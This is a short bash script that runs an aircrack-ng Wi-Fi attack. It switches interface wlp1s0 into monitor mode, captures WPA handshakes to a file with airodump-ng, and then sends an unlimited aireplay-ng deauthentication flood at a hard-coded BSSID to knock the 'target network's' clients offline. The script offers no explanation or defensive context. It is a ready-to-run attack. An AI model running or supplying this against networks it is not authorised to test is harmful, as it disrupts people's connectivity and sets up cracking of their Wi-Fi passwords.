#!/bin/bash

clear
sudo ifconfig
echo "-------------------------"
sudo iwconfig
echo "-------------------------"
sudo /usr/sbin/airmon-ng 

port="wlp1s0"
monport="wlp1s0mon"  

echo "[1]:airmon-ng check kill"
sudo airmon-ng check kill

echo "[2]: airmon-ng start $port"
sudo airmon-ng start $port # Start monitoring $port
sudo /usr/sbin/airmon-ng 

echo "[3]: sudo airodump-ng $monport -w handshakes -b abg"
  
sudo airodump-ng $monport -w handshakes -b abg


echo "Open a new terminal window to disconnect the clients connected 
    to the target network.  "

BSSID="B0:BB:E5:A4:DA:04"
sudo aireplay-ng -0 0 -a $BSSID wlp1s0mon   
 
